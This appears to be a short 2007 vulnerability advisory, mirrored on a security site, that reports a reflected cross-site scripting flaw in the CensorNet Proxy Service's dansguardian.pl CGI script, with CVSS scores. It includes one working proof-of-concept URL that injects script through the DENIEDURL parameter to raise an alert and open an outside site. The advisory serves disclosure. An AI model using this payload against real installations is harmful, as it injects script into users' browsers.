CensorNet: Cross Site Scripting Vulnerability

2007.10.25
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Hello, A cross site scripting vulnerability exists in the CensorNet Proxy Service (www.censornet.com) that allows scripting (and html) to be passed to the cgi script and displayed in the web browser. Exploit: http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Count er-Strike__servers__from__?10_per_month!');window.open("http://www.socke tx.co.uk")</script> Regards, Richard Maudsley - ------------------------------------------------------------------- This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the content of this email please contact abuse (at) rbwm (dot) org [email concealed] - -------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top